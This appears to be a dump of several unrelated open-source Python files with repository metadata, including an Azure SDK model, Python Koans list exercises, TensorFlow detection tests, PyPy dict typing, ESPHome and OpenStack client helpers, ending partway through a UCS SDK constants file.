'connect_via': {'key': 'connectVia', 'type': 'IntegrationRuntimeReference'},
'description': {'key': 'description', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterSpecification}'},
'annotations': {'key': 'annotations', 'type': '[object]'},
'type': {'key': 'type', 'type': 'str'},
'server': {'key': 'typeProperties.server', 'type': 'object'},
'username': {'key': 'typeProperties.username', 'type': 'object'},
'password': {'key': 'typeProperties.password', 'type': 'SecretBase'},
'database': {'key': 'typeProperties.database', 'type': 'object'},
'port': {'key': 'typeProperties.port', 'type': 'object'},
'encrypted_credential': {'key': 'typeProperties.encryptedCredential', 'type': 'object'},
}
def __init__(self, *, server, database, additional_properties=None, connect_via=None, description: str=None, parameters=None, annotations=None, username=None, password=None, port=None, encrypted_credential=None, **kwargs) -> None:
super(AmazonRedshiftLinkedService, self).__init__(additional_properties=additional_properties, connect_via=connect_via, description=description, parameters=parameters, annotations=annotations, **kwargs)
self.server = server
self.username = username
self.password = password
self.database = database
self.port = port
self.encrypted_credential = encrypted_credential
self.type = 'AmazonRedshift'
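# A minimal construction sketch for reference (illustrative values only;
# SecureString is assumed here as the SecretBase subtype for inline secrets):
#
#   ls = AmazonRedshiftLinkedService(
#       server='my-cluster.example.com',
#       database='dev',
#       username='admin',
#       password=SecureString(value='...'),
#       port=5439)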
| 48.712644 | 234 | 0.674139 | [
"MIT"
] | James-DBA-Anderson/azure-sdk-for-python | sdk/datafactory/azure-mgmt-datafactory/azure/mgmt/datafactory/models/amazon_redshift_linked_service_py3.py | 4,238 | Python |
import os,sys
import numpy as np
import h5py, time, argparse, itertools, datetime
from scipy import ndimage
import torchvision.utils as vutils
# tensorboardX
from tensorboardX import SummaryWriter
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
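    # Typical use (illustrative): keep one meter per metric, call
    # update(value, n=batch_size) every step, and read .avg at epoch end, e.g.
    #   loss_meter = AverageMeter()
    #   loss_meter.update(loss_value, n=batch_size)
    #   print(loss_meter.avg)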
def get_logger(args):
log_name = args.output+'/log'
date = str(datetime.datetime.now()).split(' ')[0]
time = str(datetime.datetime.now()).split(' ')[1].split('.')[0]
log_name += date+'_'+time
    logger = open(log_name+'.txt','w')  # buffered text log; call logger.flush() for instant writes
# tensorboardX
writer = SummaryWriter('runs/'+log_name)
return logger, writer
| 24.025 | 68 | 0.627471 | [
"MIT"
] | ygCoconut/pytorch_connectomics | torch_connectomics/io/misc.py | 961 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutArrays in the Ruby Koans
#
from runner.koan import *
class AboutLists(Koan):
def test_creating_lists(self):
empty_list = list()
self.assertEqual(list, type(empty_list))
self.assertEqual(0, len(empty_list))
def test_list_literals(self):
nums = list()
self.assertEqual([], nums)
nums[0:] = [1]
self.assertEqual([1], nums)
nums[1:] = [2]
self.assertListEqual([1, 2], nums)
nums.append(333)
self.assertListEqual([1, 2, 333], nums)
def test_accessing_list_elements(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual('peanut', noms[0])
self.assertEqual('jelly', noms[3])
self.assertEqual('jelly', noms[-1])
self.assertEqual('butter', noms[-3])
def test_slicing_lists(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['peanut'], noms[0:1])
self.assertEqual(['peanut','butter'], noms[0:2])
self.assertEqual([], noms[2:2])
self.assertEqual(['and','jelly'], noms[2:20])
self.assertEqual([], noms[4:0])
self.assertEqual([], noms[4:100])
self.assertEqual([], noms[5:0])
def test_slicing_to_the_edge(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['and','jelly'], noms[2:])
self.assertEqual(['peanut','butter'], noms[:2])
def test_lists_and_ranges(self):
self.assertEqual(range, type(range(5)))
self.assertNotEqual([1, 2, 3, 4, 5], range(1,6))
        self.assertEqual([0,1,2,3,4], list(range(5)))
self.assertEqual([5,6,7,8], list(range(5, 9)))
def test_ranges_with_steps(self):
self.assertEqual([5,4], list(range(5, 3, -1)))
self.assertEqual([0,2,4,6], list(range(0, 8, 2)))
self.assertEqual([1,4,7], list(range(1, 8, 3)))
self.assertEqual([5,1,-3], list(range(5, -7, -4)))
self.assertEqual([5,1,-3,-7], list(range(5, -8, -4)))
def test_insertions(self):
knight = ['you', 'shall', 'pass']
knight.insert(2, 'not')
self.assertEqual(['you', 'shall', 'not', 'pass'], knight)
knight.insert(0, 'Arthur')
self.assertEqual(['Arthur','you', 'shall', 'not', 'pass' ], knight)
def test_popping_lists(self):
stack = [10, 20, 30, 40]
stack.append('last')
self.assertEqual([10, 20, 30, 40, 'last'], stack)
popped_value = stack.pop()
self.assertEqual('last', popped_value)
self.assertEqual([10, 20, 30, 40], stack)
popped_value = stack.pop(1)
self.assertEqual(20, popped_value)
self.assertEqual([10, 30, 40], stack)
# Notice that there is a "pop" but no "push" in python?
# Part of the Python philosophy is that there ideally should be one and
# only one way of doing anything. A 'push' is the same as an 'append'.
# To learn more about this try typing "import this" from the python
# console... ;)
def test_making_queues(self):
queue = [1, 2]
queue.append('last')
self.assertEqual([1,2,'last'], queue)
popped_value = queue.pop(0)
self.assertEqual(1, popped_value)
self.assertEqual([2,'last'], queue)
# Note, popping from the left hand side of a list is
# inefficient. Use collections.deque instead.
| 31.463636 | 79 | 0.576712 | [
"MIT"
] | forwardBench/pythonKoans | python3/koans/about_lists.py | 3,461 | Python |
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2009, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Factoids', True)
class FactoidFormat(registry.TemplatedString):
"""Value must include $value, otherwise the factoid's value would be left
out."""
requiredTemplates = ['value']
Factoids = conf.registerPlugin('Factoids')
conf.registerChannelValue(Factoids, 'learnSeparator',
registry.String('as', """Determines what separator must be used in the
learn command. Defaults to 'as' -- learn <key> as <value>. Users might
feel more comfortable with 'is' or something else, so it's
configurable."""))
conf.registerChannelValue(Factoids, 'showFactoidIfOnlyOneMatch',
registry.Boolean(True, """Determines whether the bot will reply with the
single matching factoid if only one factoid matches when using the search
command."""))
conf.registerChannelValue(Factoids, 'replyWhenInvalidCommand',
registry.Boolean(True, """Determines whether the bot will reply to invalid
commands by searching for a factoid; basically making the whatis
unnecessary when you want all factoids for a given key."""))
conf.registerChannelValue(Factoids, 'format',
FactoidFormat('$key could be $value.', """Determines the format of
the response given when a factoid's value is requested. All the standard
substitutes apply, in addition to "$key" for the factoid's key and "$value"
for the factoid's value."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| 51.147059 | 79 | 0.757332 | [
"BSD-3-Clause"
] | DalavanCloud/supybot | plugins/Factoids/config.py | 3,478 | Python |
from seleniumbase import BaseCase
class MyTourClass(BaseCase):
def test_google_tour(self):
self.open('https://google.com/ncr')
self.wait_for_element('input[title="Search"]')
# Create a website tour using the ShepherdJS library with "dark" theme
# Same as: self.create_shepherd_tour(theme="dark")
self.create_tour(theme="dark")
self.add_tour_step("Welcome to Google!", title="SeleniumBase Tours")
self.add_tour_step("Type in your query here.", 'input[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "Google")
self.wait_for_element('[role="listbox"]') # Wait for autocomplete
# Create a website tour using the ShepherdJS library with "light" theme
# Same as: self.create_shepherd_tour(theme="light")
self.create_tour(theme="light")
self.add_tour_step("Then click to search.", '[value="Google Search"]')
self.add_tour_step("Or press [ENTER] after entry.", '[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "GitHub\n")
self.wait_for_element("#search")
# Create a website tour using the Bootstrap Tour JS library
# Same as: self.create_bootstrap_tour()
self.create_tour(theme="bootstrap")
self.add_tour_step("See Results Here!", title="(5-second autoplay)")
self.add_tour_step("Here's the next tour:")
self.play_tour(interval=5) # Tour automatically continues after 5 sec
self.open("https://www.google.com/maps/@42.3598616,-71.0912631,15z")
self.wait_for_element("#searchboxinput")
self.wait_for_element("#minimap")
self.wait_for_element("#zoom")
# Create a website tour using the IntroJS library
# Same as: self.create_introjs_tour()
self.create_tour(theme="introjs")
self.add_tour_step("Welcome to Google Maps!")
self.add_tour_step("Type in a location here.",
"#searchboxinput", title="Search Box")
self.add_tour_step("Then click here to show it on the map.",
"#searchbox-searchbutton", alignment="bottom")
self.add_tour_step("Or click here to get driving directions.",
"#searchbox-directions", alignment="bottom")
self.add_tour_step("Use this button to switch to Satellite view.",
"#minimap div.widget-minimap", alignment="right")
self.add_tour_step("Click here to zoom in.",
"#widget-zoom-in", alignment="left")
self.add_tour_step("Or click here to zoom out.",
"#widget-zoom-out", alignment="left")
self.add_tour_step("Use the Menu button to see more options.",
".searchbox-hamburger-container", alignment="right")
self.add_tour_step("Or click here to see more Google apps.",
'[title="Google apps"]', alignment="left")
self.add_tour_step("Thanks for using SeleniumBase Tours!",
title="End of Guided Tour")
self.export_tour() # The default name for exports is "my_tour.js"
self.play_tour()
| 49.606061 | 79 | 0.622175 | [
"MIT"
] | 1374250553/SeleniumBase | examples/tour_examples/google_tour.py | 3,274 | Python |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utils.target_assigner_utils."""
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.utils import target_assigner_utils as ta_utils
from object_detection.utils import test_case
class TargetUtilTest(parameterized.TestCase, test_case.TestCase):
def test_image_shape_to_grids(self):
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=2, width=3)
return y_grid, x_grid
expected_y_grid = np.array([[0, 0, 0], [1, 1, 1]])
expected_x_grid = np.array([[0, 1, 2], [0, 1, 2]])
y_grid, x_grid = self.execute(graph_fn, [])
np.testing.assert_array_equal(y_grid, expected_y_grid)
np.testing.assert_array_equal(x_grid, expected_x_grid)
@parameterized.parameters((False,), (True,))
def test_coordinates_to_heatmap(self, sparse):
if not hasattr(tf, 'tensor_scatter_nd_max'):
self.skipTest('Cannot test function due to old TF version.')
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=3, width=5)
y_coordinates = tf.constant([1.5, 0.5], dtype=tf.float32)
x_coordinates = tf.constant([2.5, 4.5], dtype=tf.float32)
sigma = tf.constant([0.1, 0.5], dtype=tf.float32)
channel_onehot = tf.constant([[1, 0, 0], [0, 1, 0]], dtype=tf.float32)
channel_weights = tf.constant([1, 1], dtype=tf.float32)
heatmap = ta_utils.coordinates_to_heatmap(y_grid, x_grid, y_coordinates,
x_coordinates, sigma,
channel_onehot,
channel_weights, sparse=sparse)
return heatmap
heatmap = self.execute(graph_fn, [])
# Peak at (1, 2) for the first class.
self.assertAlmostEqual(1.0, heatmap[1, 2, 0])
# Peak at (0, 4) for the second class.
self.assertAlmostEqual(1.0, heatmap[0, 4, 1])
def test_compute_floor_offsets_with_indices_onlysource(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[0.5, 0.5], [0.3, 0.2]]))
np.testing.assert_array_almost_equal(indices,
np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_and_targets(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[1.1, -0.8], [0.1, 0.5]]))
np.testing.assert_array_almost_equal(indices, np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_multisources(self):
def graph_fn():
y_source = tf.constant([[1.0, 0.0], [2.0, 3.0]], dtype=tf.float32)
x_source = tf.constant([[2.0, 4.0], [3.0, 3.0]], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
# Offset from the first source to target.
np.testing.assert_array_almost_equal(offsets[:, 0, :],
np.array([[1.1, -0.8], [-1.9, 1.5]]))
# Offset from the second source to target.
np.testing.assert_array_almost_equal(offsets[:, 1, :],
np.array([[2.1, -2.8], [-2.9, 1.5]]))
# Indices from the first source to target.
np.testing.assert_array_almost_equal(indices[:, 0, :],
np.array([[1, 2], [2, 3]]))
# Indices from the second source to target.
np.testing.assert_array_almost_equal(indices[:, 1, :],
np.array([[0, 4], [3, 3]]))
def test_get_valid_keypoints_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_mask = np.array([[0, 1], [0, 0], [1, 0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_get_valid_keypoints_with_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
weights = tf.constant([0.0, 0.0, 1.0])
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
class_weights=weights,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
expected_mask = np.array([[0, 0], [0, 0], [1, 0]])
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_blackout_pixel_weights_by_box_regions(self):
def graph_fn():
boxes = tf.constant(
[[0.0, 0.0, 5, 5], [0.0, 0.0, 10.0, 20.0], [6.0, 12.0, 8.0, 18.0]],
dtype=tf.float32)
blackout = tf.constant([True, False, True], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# All zeros in region [0:6, 0:6].
self.assertAlmostEqual(np.sum(output[0:6, 0:6]), 0.0)
# All zeros in region [12:19, 6:9].
self.assertAlmostEqual(np.sum(output[6:9, 12:19]), 0.0)
# All other pixel weights should be 1.0.
# 20 * 10 - 6 * 6 - 3 * 7 = 143.0
self.assertAlmostEqual(np.sum(output), 143.0)
def test_blackout_pixel_weights_by_box_regions_zero_instance(self):
def graph_fn():
boxes = tf.zeros([0, 4], dtype=tf.float32)
blackout = tf.zeros([0], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# The output should be all 1s since there's no annotation provided.
np.testing.assert_array_equal(output, np.ones([10, 20], dtype=np.float32))
def test_get_surrounding_grids(self):
def graph_fn():
y_coordinates = tf.constant([0.5], dtype=tf.float32)
x_coordinates = tf.constant([4.5], dtype=tf.float32)
output = ta_utils.get_surrounding_grids(
height=3,
width=5,
y_coordinates=y_coordinates,
x_coordinates=x_coordinates,
radius=1)
return output
y_indices, x_indices, valid = self.execute(graph_fn, [])
# Five neighboring indices: [-1, 4] (out of bound), [0, 3], [0, 4],
# [0, 5] (out of bound), [1, 4].
np.testing.assert_array_almost_equal(
y_indices,
np.array([[0.0, 0.0, 0.0, 0.0, 1.0]]))
np.testing.assert_array_almost_equal(
x_indices,
np.array([[0.0, 3.0, 4.0, 0.0, 4.0]]))
self.assertAllEqual(valid, [[False, True, True, False, True]])
if __name__ == '__main__':
tf.test.main()
| 41.669355 | 81 | 0.596865 | [
"MIT"
] | DemonDamon/mask-detection-based-on-tf2odapi | object_detection/utils/target_assigner_utils_test.py | 10,334 | Python |
from pypy.tool.pairtype import pairtype
from pypy.annotation import model as annmodel
from pypy.objspace.flow.model import Constant
from pypy.rpython.lltypesystem import lltype
from pypy.rlib.rarithmetic import r_uint
from pypy.rlib.objectmodel import hlinvoke
from pypy.rpython import robject
from pypy.rlib import objectmodel
from pypy.rpython import rmodel
class __extend__(annmodel.SomeDict):
def rtyper_makerepr(self, rtyper):
dictkey = self.dictdef.dictkey
dictvalue = self.dictdef.dictvalue
s_key = dictkey .s_value
s_value = dictvalue.s_value
force_non_null = self.dictdef.force_non_null
if (s_key.__class__ is annmodel.SomeObject and s_key.knowntype == object and
s_value.__class__ is annmodel.SomeObject and s_value.knowntype == object):
return robject.pyobj_repr
else:
if dictkey.custom_eq_hash:
custom_eq_hash = lambda: (rtyper.getrepr(dictkey.s_rdict_eqfn),
rtyper.getrepr(dictkey.s_rdict_hashfn))
else:
custom_eq_hash = None
return rtyper.type_system.rdict.DictRepr(rtyper,
lambda: rtyper.getrepr(s_key),
lambda: rtyper.getrepr(s_value),
dictkey,
dictvalue,
custom_eq_hash,
force_non_null)
def rtyper_makekey(self):
self.dictdef.dictkey .dont_change_any_more = True
self.dictdef.dictvalue.dont_change_any_more = True
return (self.__class__, self.dictdef.dictkey, self.dictdef.dictvalue)
class AbstractDictRepr(rmodel.Repr):
def pickrepr(self, item_repr):
if self.custom_eq_hash:
return item_repr, item_repr
else:
return self._externalvsinternal(self.rtyper, item_repr)
pickkeyrepr = pickrepr
def compact_repr(self):
return 'DictR %s %s' % (self.key_repr.compact_repr(), self.value_repr.compact_repr())
def recast_value(self, llops, v):
return llops.convertvar(v, self.value_repr, self.external_value_repr)
def recast_key(self, llops, v):
return llops.convertvar(v, self.key_repr, self.external_key_repr)
def rtype_newdict(hop):
hop.inputargs() # no arguments expected
r_dict = hop.r_result
if r_dict == robject.pyobj_repr: # special case: SomeObject: SomeObject dicts!
cdict = hop.inputconst(robject.pyobj_repr, dict)
return hop.genop('simple_call', [cdict], resulttype = robject.pyobj_repr)
cDICT = hop.inputconst(lltype.Void, r_dict.DICT)
v_result = hop.gendirectcall(hop.rtyper.type_system.rdict.ll_newdict, cDICT)
return v_result
class AbstractDictIteratorRepr(rmodel.IteratorRepr):
def newiter(self, hop):
v_dict, = hop.inputargs(self.r_dict)
citerptr = hop.inputconst(lltype.Void, self.lowleveltype)
return hop.gendirectcall(self.ll_dictiter, citerptr, v_dict)
def rtype_next(self, hop):
variant = self.variant
v_iter, = hop.inputargs(self)
if variant in ('keys', 'values'):
c1 = hop.inputconst(lltype.Void, None)
else:
c1 = hop.inputconst(lltype.Void, hop.r_result.lowleveltype)
# record that we know about these two possible exceptions
hop.has_implicit_exception(StopIteration)
hop.has_implicit_exception(RuntimeError)
hop.exception_is_here()
v = hop.gendirectcall(self.ll_dictnext, c1, v_iter)
if variant == 'keys':
return self.r_dict.recast_key(hop.llops, v)
elif variant == 'values':
return self.r_dict.recast_value(hop.llops, v)
else:
return v
| 39.57 | 93 | 0.627496 | [
"MIT"
] | benoitc/pypy | pypy/rpython/rdict.py | 3,957 | Python |
import voluptuous as vol
from esphome.components import fan, output
import esphome.config_validation as cv
from esphome.const import CONF_HIGH, CONF_LOW, CONF_MAKE_ID, CONF_MEDIUM, CONF_NAME, \
CONF_OSCILLATION_OUTPUT, CONF_OUTPUT, CONF_SPEED, CONF_SPEED_COMMAND_TOPIC, \
CONF_SPEED_STATE_TOPIC
from esphome.cpp_generator import add, get_variable, variable
from esphome.cpp_types import App
PLATFORM_SCHEMA = cv.nameable(fan.FAN_PLATFORM_SCHEMA.extend({
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(fan.MakeFan),
vol.Required(CONF_OUTPUT): cv.use_variable_id(output.FloatOutput),
vol.Optional(CONF_SPEED_STATE_TOPIC): cv.publish_topic,
vol.Optional(CONF_SPEED_COMMAND_TOPIC): cv.subscribe_topic,
vol.Optional(CONF_OSCILLATION_OUTPUT): cv.use_variable_id(output.BinaryOutput),
vol.Optional(CONF_SPEED): cv.Schema({
vol.Required(CONF_LOW): cv.percentage,
vol.Required(CONF_MEDIUM): cv.percentage,
vol.Required(CONF_HIGH): cv.percentage,
}),
}).extend(cv.COMPONENT_SCHEMA.schema))
def to_code(config):
for output_ in get_variable(config[CONF_OUTPUT]):
yield
rhs = App.make_fan(config[CONF_NAME])
fan_struct = variable(config[CONF_MAKE_ID], rhs)
if CONF_SPEED in config:
speeds = config[CONF_SPEED]
add(fan_struct.Poutput.set_speed(output_,
speeds[CONF_LOW],
speeds[CONF_MEDIUM],
speeds[CONF_HIGH]))
else:
add(fan_struct.Poutput.set_speed(output_))
if CONF_OSCILLATION_OUTPUT in config:
for oscillation_output in get_variable(config[CONF_OSCILLATION_OUTPUT]):
yield
add(fan_struct.Poutput.set_oscillation(oscillation_output))
fan.setup_fan(fan_struct.Pstate, config)
| 41.044444 | 86 | 0.707093 | [
"MIT"
] | Russel-dox/ESPHome | esphome/components/fan/speed.py | 1,847 | Python |
print()
print("--- Math ---")
print(1+1)
print(1*3)
print(1/2)
print(3**2)
print(4%2)
print(4%2 == 0)
print(type(1))
print(type(1.0)) | 13.3 | 21 | 0.586466 | [
"MIT"
] | augustoscher/python-excercises | basics/math.py | 133 | Python |
import os
from keystoneauth1.identity import v3
from keystoneauth1 import session
from novaclient import client
VERSION=2
AUTH_URL=os.getenv("OS_AUTH_URL")
USERNAME=os.getenv("OS_USERNAME")
PASSWORD=os.getenv("OS_PASSWORD")
PROJECT_ID=os.getenv("OS_PROJECT_ID")
PROJECT_NAME=os.getenv("OS_PROJECT_NAME")
USER_DOMAIN_ID=os.getenv("OS_USER_DOMAIN_ID")
PROJECT_DOMAIN_ID=os.getenv("OS_PROJECT_DOMAIN_ID")
CACERT=os.getenv("OS_CACERT")
def auth():
auth = v3.Password(auth_url=AUTH_URL, username=USERNAME, password=PASSWORD,
project_name=PROJECT_NAME, user_domain_id=USER_DOMAIN_ID,
project_domain_id=PROJECT_DOMAIN_ID)
sess = session.Session(auth=auth,verify=CACERT)
nova = client.Client(VERSION, session=sess)
return nova
| 31.791667 | 79 | 0.781127 | [
"Apache-2.0"
] | Manashree/I590-Projects-BigData-Software | src/hw-5/lib/nclient.py | 763 | Python |
"""This module contains the general information for IdentMetaSystemFsm ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class IdentMetaSystemFsmConsts:
COMPLETION_TIME_ = ""
CURRENT_FSM_NOP = "nop"
CURRENT_FSM_SYNC = "sync"
CURRENT_FSM_UCSC_UNIV_SYNC = "ucscUnivSync"
FSM_STATUS_FAIL = "fail"
FSM_STATUS_IN_PROGRESS = "inProgress"
FSM_STATUS_NOP = "nop"
FSM_STATUS_PENDING = "pending"
FSM_STATUS_SKIP = "skip"
FSM_STATUS_SUCCESS = "success"
FSM_STATUS_THROTTLED = "throttled"
RMT_ERR_CODE_ERR_2FA_AUTH_RETRY = "ERR-2fa-auth-retry"
RMT_ERR_CODE_ERR_ACTIVATE_FAILED = "ERR-ACTIVATE-failed"
RMT_ERR_CODE_ERR_ACTIVATE_IN_PROGRESS = "ERR-ACTIVATE-in-progress"
RMT_ERR_CODE_ERR_ACTIVATE_RETRY = "ERR-ACTIVATE-retry"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_BIOS = "ERR-BIOS-TOKENS-OLD-BIOS"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_CIMC = "ERR-BIOS-TOKENS-OLD-CIMC"
RMT_ERR_CODE_ERR_BIOS_NETWORK_BOOT_ORDER_NOT_FOUND = "ERR-BIOS-network-boot-order-not-found"
RMT_ERR_CODE_ERR_BOARDCTRLUPDATE_IGNORE = "ERR-BOARDCTRLUPDATE-ignore"
RMT_ERR_CODE_ERR_DIAG_CANCELLED = "ERR-DIAG-cancelled"
RMT_ERR_CODE_ERR_DIAG_FSM_RESTARTED = "ERR-DIAG-fsm-restarted"
RMT_ERR_CODE_ERR_DIAG_TEST_FAILED = "ERR-DIAG-test-failed"
RMT_ERR_CODE_ERR_DNLD_AUTHENTICATION_FAILURE = "ERR-DNLD-authentication-failure"
RMT_ERR_CODE_ERR_DNLD_HOSTKEY_MISMATCH = "ERR-DNLD-hostkey-mismatch"
RMT_ERR_CODE_ERR_DNLD_INVALID_IMAGE = "ERR-DNLD-invalid-image"
RMT_ERR_CODE_ERR_DNLD_NO_FILE = "ERR-DNLD-no-file"
RMT_ERR_CODE_ERR_DNLD_NO_SPACE = "ERR-DNLD-no-space"
RMT_ERR_CODE_ERR_DNLD_USB_UNMOUNTED = "ERR-DNLD-usb-unmounted"
RMT_ERR_CODE_ERR_DNS_DELETE_ERROR = "ERR-DNS-delete-error"
RMT_ERR_CODE_ERR_DNS_GET_ERROR = "ERR-DNS-get-error"
RMT_ERR_CODE_ERR_DNS_SET_ERROR = "ERR-DNS-set-error"
RMT_ERR_CODE_ERR_DIAGNOSTICS_IN_PROGRESS = "ERR-Diagnostics-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_MEMTEST_IN_PROGRESS = "ERR-Diagnostics-memtest-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_NETWORK_IN_PROGRESS = "ERR-Diagnostics-network-in-progress"
RMT_ERR_CODE_ERR_FILTER_ILLEGAL_FORMAT = "ERR-FILTER-illegal-format"
RMT_ERR_CODE_ERR_FSM_NO_SUCH_STATE = "ERR-FSM-no-such-state"
RMT_ERR_CODE_ERR_HOST_FRU_IDENTITY_MISMATCH = "ERR-HOST-fru-identity-mismatch"
RMT_ERR_CODE_ERR_HTTP_SET_ERROR = "ERR-HTTP-set-error"
RMT_ERR_CODE_ERR_HTTPS_SET_ERROR = "ERR-HTTPS-set-error"
RMT_ERR_CODE_ERR_IBMC_ANALYZE_RESULTS = "ERR-IBMC-analyze-results"
RMT_ERR_CODE_ERR_IBMC_CONNECT_ERROR = "ERR-IBMC-connect-error"
RMT_ERR_CODE_ERR_IBMC_CONNECTOR_INFO_RETRIEVAL_ERROR = "ERR-IBMC-connector-info-retrieval-error"
